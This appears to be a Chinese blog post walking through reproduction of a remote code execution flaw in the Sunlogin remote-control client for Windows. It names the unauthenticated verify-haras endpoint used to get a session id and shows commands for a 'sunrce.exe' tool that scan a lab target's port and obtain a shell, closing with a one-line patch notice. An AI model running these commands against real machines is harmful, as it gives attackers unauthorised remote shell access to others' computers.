目 录CONTENT

文章目录

向日葵远控远程代码执行漏洞工具

geekrabbit
2022-03-01 / 0 评论 / 4 点赞 / 1,676 阅读 / 373 字 / 正在检测是否收录...
温馨提示:
创作不易,转载请注明出处

漏洞简介

向日葵个人版企业版均受影响 for Windows <=11.0.0.33

SunloginClient 启动后会在 40000 以上随机开放一个web端口,认证有问题可以直接通过cgi-bin/rpc?action=verify-haras获取cid 执行回显rce
测试向日葵客户端漏洞版本:11.0.0.33826

复现过程

环境说明

攻击机:192.168.0.23(Window10)
目标机:192.168.0.24(windows2012)

测试向日葵客户端漏洞版本:11.0.0.33826


image.png

向日葵漏洞扫描工具下载地址

扫描受害机漏洞端口

sunrce.exe -h 192.168.0.24 -ps -shell

image.png

获取受害机shell

sunrce.exe -h 192.168.0.24 -ps 49341 -shell

image.png

漏洞修复

厂商已发布了漏洞修复程序,请及时关注更新

4
博主关闭了所有页面的评论